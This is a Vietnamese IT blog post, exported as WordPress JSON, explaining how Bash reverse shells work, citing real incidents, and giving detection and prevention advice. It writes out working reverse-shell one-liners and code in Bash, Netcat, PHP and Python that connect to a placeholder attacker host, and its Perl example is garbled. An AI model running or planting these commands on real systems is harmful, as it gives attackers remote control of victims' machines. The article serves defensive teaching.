{"id":86370,"date":"2025-04-26T18:30:12","date_gmt":"2025-04-26T11:30:12","guid":{"rendered":"https:\/\/itviec1.uptech.vn\/?p=86370"},"modified":"2025-04-26T18:32:35","modified_gmt":"2025-04-26T11:32:35","slug":"bash-reverse-shell-la-gi","status":"publish","type":"post","link":"https:\/\/itviec.com\/blog\/bash-reverse-shell-la-gi\/","title":{"rendered":"What is a Bash reverse shell: how to detect and defend against reverse shells effectively"},"content":{"rendered":"<p><em><strong>A reverse shell is one of the common tools attackers use to break into a target system and take control of it. With its stealthy characteristics and its ability to get past security mechanisms, the reverse shell is a major challenge for protecting systems.
This article covers real-world cases involving reverse shells, for example the Bash reverse shell, and how to defend against them; if you want to learn about system security, don't skip it.<\/strong><\/em><\/p>\n<p><span style=\"font-weight: 400;\">Read this article to better understand:<\/span><\/p>\n<ul>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400;\">What is a Bash reverse shell?<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400;\">Some examples of reverse shells<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400;\">Some real-world cases involving reverse shells<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400;\">How to detect and defend against them<\/span><\/li>\n<\/ul>\n<h2><span class=\"ez-toc-section\" id=\"Bash_reverse_shell_la_gi\"><\/span><b>What is a Bash reverse shell?<\/b><span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p><span style=\"font-weight: 400;\"><strong>A Bash reverse shell is a kind of reverse shell that uses Bash<\/strong> (the common shell on Unix\/Linux systems) to execute commands on the victim machine.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">A reverse shell is an attack technique that lets the attacker establish a connection from the target machine to their own machine, the opposite of a normal shell. Whereas a normal shell (forward shell) requires the user to connect to the remote machine, a reverse shell works in the opposite direction: when a Bash reverse shell is established, the victim machine connects back to the attacker's machine and provides remote control through Bash. This connection is usually made over TCP, though other protocols such as ICMP or UDP are sometimes used.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">This lets the attacker take control of the victim machine without being detected by security tools such as firewalls, and without needing to access the system directly.
As a result, a reverse shell is a very powerful and dangerous tool: once in control of the victim machine, the attacker can steal data, plant malware, or escalate privileges to attack other systems on the victim's network.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">However, a Bash reverse shell can be detected and blocked if the system is properly protected, especially when effective monitoring and prevention tools are in use.<\/span><\/p>\n<blockquote><p><em>Read more: <a href=\"https:\/\/itviec.com\/blog\/bash-shell-la-gi\/\" target=\"_blank\" rel=\"noopener\"><strong>What is Bash Shell? The main features of Bash Shell<\/strong><\/a><\/em><\/p><\/blockquote>\n<h2><span class=\"ez-toc-section\" id=\"Cach_reverse_shell_hoat_dong\"><\/span><b>How a reverse shell works<\/b><span class=\"ez-toc-section-end\"><\/span><\/h2>\n<ol>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><b>The attacker prepares a server:<\/b><span style=\"font-weight: 400;\"> The attacker sets up their machine to wait for a connection from the victim machine on a specific port.
Attackers typically use a tool such as Netcat to create a server that waits for incoming connections.<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><b>The victim machine connects back<\/b><span style=\"font-weight: 400;\">: Instead of the attacker's machine actively connecting to the victim machine, the victim machine connects back to the attacker's machine on its own. This can be done through a payload (attack code) delivered to the victim system via security vulnerabilities. The payload is often a simple bash command such as <\/span><span style=\"font-weight: 400;\">bash -i &gt;&amp; \/dev\/tcp\/ATTACKER_IP\/PORT 0&gt;&amp;1<\/span><span style=\"font-weight: 400;\"> or a variant of it.<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><b>Remote control of the victim machine<\/b><span style=\"font-weight: 400;\">: Once the connection is established, the attacker can use a shell (for example, a Bash shell) to control the victim machine remotely and perform actions such as copying files, changing system configuration, or installing malware.
The attacker gets access with the same privileges as the process that executed the reverse shell command, so if the command was run as root, the attacker has full control of the system.<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><b>Bypassing protections<\/b><span style=\"font-weight: 400;\">: One reason the reverse shell is an effective attack tool is that it easily gets past firewalls and <\/span><i><span style=\"font-weight: 400;\">NAT*<\/span><\/i><span style=\"font-weight: 400;\"> systems. Firewalls often control only incoming connections, while outgoing connections are usually not blocked, which makes it easy for the attacker to establish a connection from the victim machine without being detected.
In addition, reverse shell connections often use common ports such as 80 (HTTP) or 443 (HTTPS) to avoid detection, because traffic on these ports is allowed in most network environments.<\/span><\/li>\n<\/ol>\n<p><b>* <\/b><b><i>NAT<\/i><\/b><b> (Network Address Translation)<\/b><span style=\"font-weight: 400;\">: a computer networking technique used to change the IP addresses in packets as they pass through a router or firewall. The main purpose of NAT is to let multiple devices on an internal network (such as a home or company network) use a single public IP address to connect to the Internet.<\/span><\/p>\n<blockquote><p><em>Read more: <a href=\"https:\/\/itviec.com\/blog\/shell-script-la-gi\/\" target=\"_blank\" rel=\"noopener\"><strong>What is a shell script: the command-line tool for developers from A to Z<\/strong><\/a><\/em><\/p><\/blockquote>\n<h2><span class=\"ez-toc-section\" id=\"Mot_vai_vi_du_cua_reverse_shell\"><\/span><b>Some reverse shell examples<\/b><span class=\"ez-toc-section-end\"><\/span><\/h2>\n<h3><b>Bash reverse shell<\/b><\/h3>\n<p><span style=\"font-weight: 400;\">This is the simplest way to create a reverse shell on Linux systems.
The attacker starts a listener (a tool or application the attacker uses to wait for connections from the victim machine) on their own machine, and the victim machine connects back to the attacker machine. For example:<\/span><\/p>\n<ul>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400;\">On the attacker machine, start the listener:<\/span><\/li>\n<\/ul>\n<pre><span style=\"font-weight: 400;\">nc -nlvp 4444<\/span><\/pre>\n<ul>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400;\">On the victim machine, run the following command to connect back to the attacker machine:<\/span><\/li>\n<\/ul>\n<pre><span style=\"font-weight: 400;\">\/bin\/bash -i &gt;&amp; \/dev\/tcp\/attacker-ip\/4444 0&gt;&amp;1<\/span><\/pre>\n<p><span style=\"font-weight: 400;\">When this command is executed, the victim machine connects back to the attacker machine, and the attacker gains control of the victim machine through the shell.
Where:<\/span><\/p>\n<ul>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400;\">-i<\/span><span style=\"font-weight: 400;\">: Runs Bash in interactive mode, allowing the attacker to send and receive commands through the shell.<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400;\">&gt;&amp; \/dev\/tcp\/attacker-ip\/4444<\/span><span style=\"font-weight: 400;\">: This is Bash redirection syntax that sends the shell's output over a TCP connection to the attacker machine. <\/span><span style=\"font-weight: 400;\">attacker-ip<\/span><span style=\"font-weight: 400;\"> is the IP address of the attacker machine and 4444 is the port opened on the attacker machine.<\/span><\/li>\n<\/ul>\n<h3><b>PHP reverse shell<\/b><\/h3>\n<p><span style=\"font-weight: 400;\">This is a very common method in attacks on web servers.
If the victim machine is a web server running PHP, the attacker can abuse PHP to create a reverse shell.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">For example, when the following command is executed, the victim machine connects back to the attacker machine and lets the attacker control the victim machine through a shell:<\/span><\/p>\n<pre><span style=\"font-weight: 400;\">php -r '$sock=fsockopen(\"attacker-ip\", 4444); exec(\"\/bin\/sh -i &lt;&amp;3 &gt;&amp;3 2&gt;&amp;3\");'<\/span><\/pre>\n<p><span style=\"font-weight: 400;\">Where:<\/span><\/p>\n<ul>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400;\">php -r<\/span><span style=\"font-weight: 400;\">: Runs PHP directly from the command line without saving it to a file.<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400;\">$sock=fsockopen(\"attacker-ip\", 4444)<\/span><span style=\"font-weight: 400;\">: Uses the fsockopen function to connect to the attacker machine's IP address (<\/span><span style=\"font-weight: 400;\">attacker-ip<\/span><span style=\"font-weight: 400;\">) on port <\/span><b><i>4444<\/i><\/b><span style=\"font-weight: 400;\">.<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400;\">exec(\"\/bin\/sh -i &lt;&amp;3 &gt;&amp;3 2&gt;&amp;3\")<\/span><span style=\"font-weight: 400;\">: Executes a shell (<\/span><span style=\"font-weight: 400;\">\/bin\/sh<\/span><span style=\"font-weight: 400;\">) on the victim machine and redirects the shell's input\/output streams to the connection to the attacker machine.<\/span><\/li>\n<\/ul>\n<h3><b>Netcat reverse shell<\/b><\/h3>\n<p><span style=\"font-weight: 400;\">Netcat is a very popular tool in network attacks, especially for creating reverse shell connections. Netcat can be used to connect the victim machine to the attacker machine very simply. For example:<\/span><\/p>\n<ul>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400;\">On the attacker machine, the attacker opens a listener on port 4444:<\/span><\/li>\n<\/ul>\n<pre><span style=\"font-weight: 400;\">nc -nlvp 4444<\/span><\/pre>\n<ul>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400;\">On the victim machine, the attacker delivers code that makes the victim machine connect back via Netcat:<\/span><\/li>\n<\/ul>\n<pre><span style=\"font-weight: 400;\">nc -e \/bin\/sh attacker-ip 4444<\/span><\/pre>\n<p><span style=\"font-weight: 400;\">When this command is executed on the victim machine, a connection is established to the attacker machine and the attacker can control the victim machine through the shell.<\/span><\/p>\n<ul>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400;\">Note: Some versions of Netcat do not support the <\/span><span style=\"font-weight: 400;\">-e<\/span><span style=\"font-weight: 400;\"> option; in that case, an alternative method can be used:<\/span><\/li>\n<\/ul>\n<pre><span style=\"font-weight: 400;\">rm \/tmp\/f;mkfifo \/tmp\/f;cat \/tmp\/f|\/bin\/sh -i 2&gt;&amp;1|nc attacker-ip 4444 &gt;\/tmp\/f<\/span><\/pre>\n<h3><b>Python reverse shell<\/b><\/h3>\n<p><span style=\"font-weight: 400;\">Python is a popular and powerful language that can also be used to create a reverse shell on a system. For example:<\/span><\/p>\n<pre><span style=\"font-weight: 400;\">import socket<\/span>\n<span style=\"font-weight: 400;\">import os<\/span>\n<span style=\"font-weight: 400;\"># Create the connection socket<\/span>\n<span style=\"font-weight: 400;\">s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)<\/span>\n<span style=\"font-weight: 400;\"># Connect to the attacker machine by IP on port 4444<\/span>\n<span style=\"font-weight: 400;\">s.connect((\"attacker-ip\", 4444))<\/span>\n<span style=\"font-weight: 400;\"># Redirect the standard streams to the network connection<\/span>\n<span style=\"font-weight: 400;\">os.dup2(s.fileno(), 0)  # stdin<\/span>\n<span style=\"font-weight: 400;\">os.dup2(s.fileno(), 1)  # stdout<\/span>\n<span style=\"font-weight: 400;\">os.dup2(s.fileno(), 2)  # stderr<\/span>\n<span style=\"font-weight: 400;\"># Run a shell (\/bin\/sh) on the victim machine<\/span>\n<span style=\"font-weight: 400;\">os.system(\"\/bin\/sh\")<\/span><\/pre>\n<p><span style=\"font-weight: 400;\">Or the commonly used one-line form:<\/span><\/p>\n<pre><span style=\"font-weight: 400;\">python -c 'import
socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"attacker-ip\",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"\/bin\/sh\",\"-i\"])'<\/span><\/pre>\n<h3><b>Perl reverse shell<\/b><\/h3>\n<p><span style=\"font-weight: 400;\">Example:<\/span><\/p>\n<p>Start the listener on the attacker machine:<\/p>\n<pre><span style=\"font-weight: 400;\">use IO::Socket;<\/span>\n<span style=\"font-weight: 400;\">$|=1;  # Disable output buffering<\/span>\n<span style=\"font-weight: 400;\"># Create a TCP socket to listen for incoming connections<\/span>\n<span style=\"font-weight: 400;\">$socket = new IO::Socket::INET (<\/span>\n<span style=\"font-weight: 400;\">    LocalHost =&gt; '0.0.0.0',  # Listen on all IP addresses<\/span>\n<span style=\"font-weight: 400;\">    LocalPort =&gt; '4444',     # The listening port is 4444<\/span>\n<span style=\"font-weight: 400;\">    Proto =&gt; 'tcp',          # TCP protocol<\/span>\n<span style=\"font-weight: 400;\">    Listen =&gt; 1,             # Allow 1 pending connection<\/span>\n<span style=\"font-weight: 400;\">    Reuse =&gt; 1               # Allow the address to be reused after closing<\/span>\n<span style=\"font-weight: 400;\">);<\/span><\/pre>\n<p>Wait for the connection from the victim machine:<\/p>\n<pre><span style=\"font-weight: 400;\">$new_socket = $socket-&gt;accept();  # Accept the connection from the victim machine and assign it to $new_socket<\/span><\/pre>\n<p><span style=\"font-weight: 400;\">Once the connection succeeds, the attacker machine opens a command shell (<\/span><span style=\"font-weight: 400;\">\/bin\/sh<\/span><span style=\"font-weight: 400;\">) on the victim machine to execute commands:<\/span><\/p>\n<pre><span style=\"font-weight: 400;\">system(\"\/bin\/sh -i &lt;&amp;3 &gt;&amp;3 2&gt;&amp;3\");  # Open a shell (\/bin\/sh) and connect it back to the attacker machine<\/span><\/pre>\n<p><span style=\"font-weight: 400;\">Finally, after executing the commands, the attacker closes the connection with:<\/span><\/p>\n<pre><span style=\"font-weight: 400;\">$new_socket-&gt;close();  # Close the connection<\/span><\/pre>\n<h2><span class=\"ez-toc-section\" id=\"Mot_so_tinh_huong_thuc_te_lien_quan_den_reverse_shell\"><\/span><b>Some real-world cases involving reverse shells<\/b><span class=\"ez-toc-section-end\"><\/span><\/h2>\n<h3><b>1. The #BrokenSesame vulnerability in Alibaba's PostgreSQL databases<\/b><\/h3>\n<p><span style=\"font-weight: 400;\">In a recent attack, the Wiz research team discovered the #BrokenSesame vulnerability in Alibaba Cloud's PostgreSQL databases.
This vulnerability arose from insufficient isolation between containers and improper write permissions to a private registry, allowing an attacker to break into the system.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">If successfully exploited, the attacker could distribute malicious packages, including reverse shells, infiltrating Alibaba's supply chain and harming its customers. Specifically, the vulnerability allowed the attacker to inject malicious scripts into the system and establish a reverse shell connection to remotely control the PostgreSQL server, and from there extend the attack to other systems on the internal network.<\/span><\/p>\n<h3><b>2. The Hell\u2019s Keychain vulnerability in IBM Cloud's PostgreSQL databases<\/b><\/h3>\n<p><span style=\"font-weight: 400;\">As with Alibaba, the Wiz team discovered the &#8220;Hell\u2019s Keychain&#8221; vulnerability in IBM Cloud's PostgreSQL databases.
This vulnerability lets an attacker escalate privileges and access critical data.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">It can lead to the leak of login credentials, passwords and access to internal systems, which can easily lead to a supply-chain attack via a reverse shell. The attacker can establish a reverse shell to maintain continuous access to the system, even after the initial connections have been detected and closed. Especially serious is that the stolen credentials can be used to create new reverse shell connections into other systems on the network.<\/span><\/p>\n<h3><b>3. Reverse shells via npm<\/b><\/h3>\n<p><span style=\"font-weight: 400;\">Another example occurred in October 2023, when security researchers discovered 48 malicious packages published on npm. These packages shipped package.json files containing malicious code, with an install hook that triggers reverse shell commands.
When the package is installed on a system, the attacker can use this connection to take control and access the victim's network systems.<\/span><\/p>\n<h3><b>4. Phishing and coding vulnerabilities in web applications<\/b><\/h3>\n<p><span style=\"font-weight: 400;\">In some attacks, the attacker exploits coding vulnerabilities in web applications or tricks users with phishing emails. The goal of these attacks is to trick the victim into uploading malicious code disguised as harmless files such as images or documents, which then triggers a reverse shell when the malicious code is executed. This is one of the common ways attackers break into a victim's network and take control of systems.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">A common technique is to use macros in Microsoft Office files, or PDF files containing malicious JavaScript. When the user opens these files and allows active content to run, they silently establish a reverse shell connection to the attacker's machine.<\/span><\/p>\n<h3><b>5.
L\u1ed7 h\u1ed5ng Log4Shell<\/b><\/h3>\n<p><span style=\"font-weight: 400;\">M\u1ed9t trong nh\u1eefng l\u1ed7 h\u1ed5ng nghi\u00eam tr\u1ecdng nh\u1ea5t trong nh\u1eefng n\u0103m g\u1ea7n \u0111\u00e2y l\u00e0 Log4Shell (CVE-2021-44228) \u1ea3nh h\u01b0\u1edfng \u0111\u1ebfn th\u01b0 vi\u1ec7n Log4j c\u1ee7a Java. L\u1ed7 h\u1ed5ng n\u00e0y cho ph\u00e9p k\u1ebb t\u1ea5n c\u00f4ng th\u1ef1c thi m\u00e3 t\u1eeb xa b\u1eb1ng c\u00e1ch g\u1eedi m\u1ed9t chu\u1ed7i \u0111\u1eb7c bi\u1ec7t \u0111\u01b0\u1ee3c thi\u1ebft k\u1ebf \u0111\u1ec3 k\u00edch ho\u1ea1t JNDI lookup.\u00a0<\/span><\/p>\n<p><span style=\"font-weight: 400;\">K\u1ebb t\u1ea5n c\u00f4ng c\u00f3 th\u1ec3 l\u1ee3i d\u1ee5ng \u0111i\u1ec1u n\u00e0y \u0111\u1ec3 t\u1ea1o c\u00e1c k\u1ebft n\u1ed1i reverse shell \u0111\u1ebfn m\u00e1y ch\u1ee7 \u0111i\u1ec1u khi\u1ec3n c\u1ee7a h\u1ecd. \u0110\u00e1ng ch\u00fa \u00fd, l\u1ed7 h\u1ed5ng n\u00e0y \u1ea3nh h\u01b0\u1edfng \u0111\u1ebfn h\u00e0ng tri\u1ec7u \u1ee9ng d\u1ee5ng v\u00e0 d\u1ecbch v\u1ee5 tr\u00ean to\u00e0n th\u1ebf gi\u1edbi, v\u00ec Log4j l\u00e0 m\u1ed9t th\u01b0 vi\u1ec7n ghi log ph\u1ed5 bi\u1ebfn \u0111\u01b0\u1ee3c s\u1eed d\u1ee5ng r\u1ed9ng r\u00e3i trong c\u00e1c \u1ee9ng d\u1ee5ng Java.<\/span><\/p>\n<h2><span class=\"ez-toc-section\" id=\"Cach_phat_hien_va_phong_chong_reverse_shell\"><\/span><b>C\u00e1ch ph\u00e1t hi\u1ec7n v\u00e0 ph\u00f2ng ch\u1ed1ng reverse shell<\/b><span class=\"ez-toc-section-end\"><\/span><\/h2>\n<h3><b>C\u00e1ch ph\u00e1t hi\u1ec7n reverse shell<\/b><\/h3>\n<p><span style=\"font-weight: 400;\">Vi\u1ec7c ph\u00e1t hi\u1ec7n reverse shell c\u00f3 th\u1ec3 g\u1eb7p kh\u00f3 kh\u0103n v\u00ec k\u1ebb t\u1ea5n c\u00f4ng c\u00f3 th\u1ec3 m\u00e3 h\u00f3a k\u1ebft n\u1ed1i v\u00e0 s\u1eed d\u1ee5ng nhi\u1ec1u c\u00f4ng c\u1ee5 kh\u00e1c nhau \u0111\u1ec3 th\u1ef1c hi\u1ec7n h\u00e0nh vi n\u00e0y. 
However, the steps below can help detect the presence of a reverse shell:<\/span><\/p>\n<ol>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><b>Check outbound connections<\/b><span style=\"font-weight: 400;\">: Most reverse shells connect from the victim machine to the attacker's machine. Reviewing all outbound connections from the victim machine can therefore help reveal abnormal connections. Firewalls or IDS\/IPS systems can help identify unrecognized outbound connections. Pay particular attention to long-lived, infrequent connections to uncommon IP addresses.<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><b>Monitor network traffic<\/b><span style=\"font-weight: 400;\">: A common way to detect a reverse shell is to monitor all network traffic entering and leaving the system. Note that connections to unfamiliar ports, or unusual connections over ports such as 80 or 443 (the HTTP\/HTTPS ports), can be a sign of a reverse shell. 
Deep Packet Inspection can help detect traffic patterns characteristic of shell commands inside ordinary protocols.<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><b>Manage and inspect processes<\/b><span style=\"font-weight: 400;\">: Reverse shells usually require shell processes to be started on the victim machine. Checking the processes and scripts running on the system can help reveal abnormal or unapproved processes. Pay special attention to unusual child processes of web applications, such as those running as www-data, or Apache\/Nginx processes running shell commands.<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><b>Use behavioral detection tools<\/b><span style=\"font-weight: 400;\">: Behavioral detection tools can help identify abnormal system activity, such as connecting to an external server and executing shell commands.<\/span><\/li>\n<\/ol>\n<h3><b>How to prevent reverse shells<\/b><\/h3>\n<p><span style=\"font-weight: 400;\">Preventing reverse shells mainly focuses on restricting unwanted connections from the victim machine to the attacking machine, as well as reducing the opportunities for attack:<\/span><\/p>\n<ul>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><b>Configure the firewall<\/b><span style=\"font-weight: 400;\">: A firewall can restrict outbound connections, but it is only effective when configured correctly. For dedicated servers, however, controlling outbound connections can be an effective preventive measure. Make sure that all connections to unnecessary ports are blocked and that only clearly defined ports such as HTTP (80) or HTTPS (443) are allowed. Set up an allowlist (whitelist) for outbound connections rather than only blocking suspicious ports.<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><b>Use IDS\/IPS (intrusion detection and prevention systems)<\/b><span style=\"font-weight: 400;\">: Intrusion detection systems (IDS) can monitor the network and identify abnormal communication patterns, such as a reverse shell. 
If any unrecognized traffic appears, the system can raise an alert and terminate the connection.<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><b>Update and patch systems (Patch Management)<\/b><span style=\"font-weight: 400;\">: Reverse shell attacks usually rely on security vulnerabilities (for example, code injection vulnerabilities). To prevent them, make sure your systems always have the latest security patches applied, especially web applications and endpoint services.<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><b>Restrict access and apply the Principle of Least Privilege<\/b><span style=\"font-weight: 400;\">: Never run applications or shells with &#8220;root&#8221; privileges on a server. Create a user account with limited privileges for each application. This reduces the chance that an attacker can take control of the victim machine and execute a reverse shell. 
Use sandbox and containerization technologies such as Docker to isolate applications and limit the impact if one application is compromised.<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><b>Restrict tools that can create a reverse shell<\/b><span style=\"font-weight: 400;\">: Restricting the tools that can create a reverse shell (such as netcat, bash or ncat) can help reduce the chance that an attacker uses them. However, because a reverse shell can be built with many different tools, you cannot eliminate this possibility entirely and can only make it harder for the attacker. Use Application Control solutions such as AppLocker on Windows or AppArmor\/SELinux on Linux to tightly control application execution.<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><b>Defend against phishing<\/b><span style=\"font-weight: 400;\">: Phishing is one of the common methods attackers use to deliver malicious code to a victim machine. 
Training employees to recognize phishing emails and deploying email security tools can help stop these attacks.<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><b>Use Web Application Firewalls (WAF)<\/b><span style=\"font-weight: 400;\">: WAFs can help identify communication patterns from a reverse shell and stop them immediately. A WAF is a powerful tool for protecting web applications from network attacks, including reverse shells. Configure the WAF to block common command injection techniques and update its rules regularly to counter new bypass techniques.<\/span><\/li>\n<\/ul>\n<h2><span class=\"ez-toc-section\" id=\"Cau_hoi_thuong_gap_ve_reverse_shell\"><\/span><b>Frequently asked questions about reverse shells<\/b><span class=\"ez-toc-section-end\"><\/span><\/h2>\n<h3><b>Why do attackers use a reverse shell instead of a bind shell?<\/b><\/h3>\n<p><span style=\"font-weight: 400;\">A reverse shell is usually used instead of a bind shell because it gets past firewalls and NAT configurations more easily. 
With a bind shell, the victim machine opens a port and waits for a connection from the attacker, which firewalls can easily detect and block.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">With a reverse shell, by contrast, the connection is made from the victim machine out to the attacker's machine, which helps it avoid detection by firewalls, because outbound connections are commonly allowed out without being monitored.<\/span><\/p>\n<h3><b>How can a reverse shell be detected on a system?<\/b><\/h3>\n<p><span style=\"font-weight: 400;\">Detecting a reverse shell on a system can be difficult because the connection may be encrypted and may use a variety of tools. 
There are still several approaches, however, such as tracking connections leaving the system and checking for unfamiliar files or unrecognized commands on the system.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">In addition, network and system monitoring tools such as an IDS (intrusion detection system) or firewalls can help detect suspicious behavior, such as connections to IP addresses outside your control.<\/span><\/p>\n<h3><b>Does a Bash reverse shell work on every system?<\/b><\/h3>\n<p><span style=\"font-weight: 400;\">A Bash reverse shell works well on most Unix-like systems, including Linux distributions and macOS, because Bash is usually preinstalled on these operating systems.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">On Windows systems, however, using a Bash reverse shell requires software such as Windows Subsystem for Linux (WSL) or similar tools that emulate a Linux environment. 
So although the Bash reverse shell is common and effective on Unix operating systems, it does not work on every system without special support.<\/span><\/p>\n<h2><span class=\"ez-toc-section\" id=\"Tong_ket\"><\/span><b>Summary<\/b><span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p><span style=\"font-weight: 400;\">In short, reverse shell attacks have occurred and continue to occur on many platforms and through many different methods. From exploiting vulnerabilities in major cloud services such as Alibaba and IBM to deceiving users through malicious packages on npm, they all demonstrate the variety and danger of these attacks.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">ITviec hopes this article has given you an overview of reverse shell and bash reverse shell attacks and of the importance of preventing them. Organizations need to proactively protect their systems by regularly checking for vulnerabilities, applying strong security measures and training employees to recognize attacks. 
For individuals, building solid knowledge of reverse shells and a clear understanding of how attacks are prevented and detected plays a very important role in protecting systems and data.<\/span><\/p>\n","protected":false},"excerpt":{"rendered":"<p>A reverse shell is one of the common tools hackers use to break into and take control of a target system. With its sophisticated characteristics and its ability to get past security mechanisms, the reverse shell has become a major challenge for [&hellip;]<\/p>\n","protected":false},"author":209,"featured_media":87362,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"_gspb_post_css":"","footnotes":""},"categories":[109],"tags":[],"class_list":["post-86370","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-chuyen-mon-it"],"blocksy_meta":[],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO Premium plugin v26.8 (Yoast SEO v27.8) - https:\/\/yoast.com\/product\/yoast-seo-premium-wordpress\/ -->\n<title>Bash reverse shell l\u00e0 g\u00ec: C\u00e1ch ph\u00e1t hi\u1ec7n v\u00e0 ph\u00f2ng ch\u1ed1ng reverse shell hi\u1ec7u qu\u1ea3 - ITviec Blog<\/title>\n<meta name=\"description\" content=\"T\u00ecm hi\u1ec3u c\u00e1ch tin t\u1eb7c d\u00f9ng reverse shell, c\u00e1c v\u00ed d\u1ee5 (nh\u01b0 bash reverse shell), c\u00e1ch ph\u00e1t hi\u1ec7n v\u00e0 ph\u00f2ng ch\u1ed1ng \u0111\u1ec3 b\u1ea3o v\u1ec7 
h\u1ec7 th\u1ed1ng t\u1ed1t nh\u1ea5t.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/itviec.com\/blog\/bash-reverse-shell-la-gi\/\" \/>\n<meta property=\"og:locale\" content=\"vi_VN\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Bash reverse shell l\u00e0 g\u00ec: C\u00e1ch ph\u00e1t hi\u1ec7n v\u00e0 ph\u00f2ng ch\u1ed1ng reverse shell hi\u1ec7u qu\u1ea3\" \/>\n<meta property=\"og:description\" content=\"Reverse shell l\u00e0 m\u1ed9t trong nh\u1eefng c\u00f4ng c\u1ee5 ph\u1ed5 bi\u1ebfn m\u00e0 c\u00e1c tin t\u1eb7c s\u1eed d\u1ee5ng \u0111\u1ec3 x\u00e2m nh\u1eadp v\u00e0 chi\u1ebfm quy\u1ec1n \u0111i\u1ec1u khi\u1ec3n h\u1ec7 th\u1ed1ng m\u1ee5c ti\u00eau. V\u1edbi nh\u1eefng \u0111\u1eb7c \u0111i\u1ec3m tinh\" \/>\n<meta property=\"og:url\" content=\"https:\/\/itviec.com\/blog\/bash-reverse-shell-la-gi\/\" \/>\n<meta property=\"og:site_name\" content=\"ITviec Blog\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/ITviec\" \/>\n<meta property=\"article:published_time\" content=\"2025-04-26T11:30:12+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2025-04-26T11:32:35+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/itviec.com\/blog\/wp-content\/uploads\/2025\/04\/bash-reverse-shell-vippro-scaled.png\" \/>\n\t<meta property=\"og:image:width\" content=\"640\" \/>\n\t<meta property=\"og:image:height\" content=\"337\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"author\" content=\"M\u1ef9 Duy\u00ean\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@ITviec\" \/>\n<meta name=\"twitter:site\" content=\"@ITviec\" \/>\n<meta name=\"twitter:label1\" content=\"\u0110\u01b0\u1ee3c vi\u1ebft b\u1edfi\" \/>\n\t<meta name=\"twitter:data1\" 
